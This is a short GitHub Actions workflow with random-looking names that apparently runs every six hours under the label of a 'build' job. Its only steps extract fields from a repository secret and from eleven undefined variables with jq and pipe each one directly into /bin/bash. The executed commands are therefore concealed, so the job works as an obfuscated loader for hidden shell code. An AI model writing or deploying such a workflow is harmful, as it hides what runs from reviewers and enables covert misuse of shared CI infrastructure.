name: xiabaile2318

on:
  workflow_dispatch:
  schedule:
    - cron: '13 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: xiabaile2318
        env:
          qrwas06: ${{ secrets.qrwas06 }}
        run: |
          echo $qrwas06 | jq -r .g687 | /bin/bash
          echo $uz6014 | jq -r .stf5 | /bin/bash
          echo $ga7977 | jq -r .qlw49 | /bin/bash
          echo $th88 | jq -r .egfzb4 | /bin/bash
          echo $digqx87518 | jq -r .s035 | /bin/bash
          echo $z15073 | jq -r .bupu5567 | /bin/bash
          echo $k3811 | jq -r .rvff2 | /bin/bash
          echo $bw51257 | jq -r .grd9 | /bin/bash
          echo $jqth8085 | jq -r .ppt3796 | /bin/bash
          echo $kjrfx7621 | jq -r .hut64 | /bin/bash
          echo $orhqn51 | jq -r .j555 | /bin/bash
          echo $btkbx7 | jq -r .sfcel3 | /bin/bash

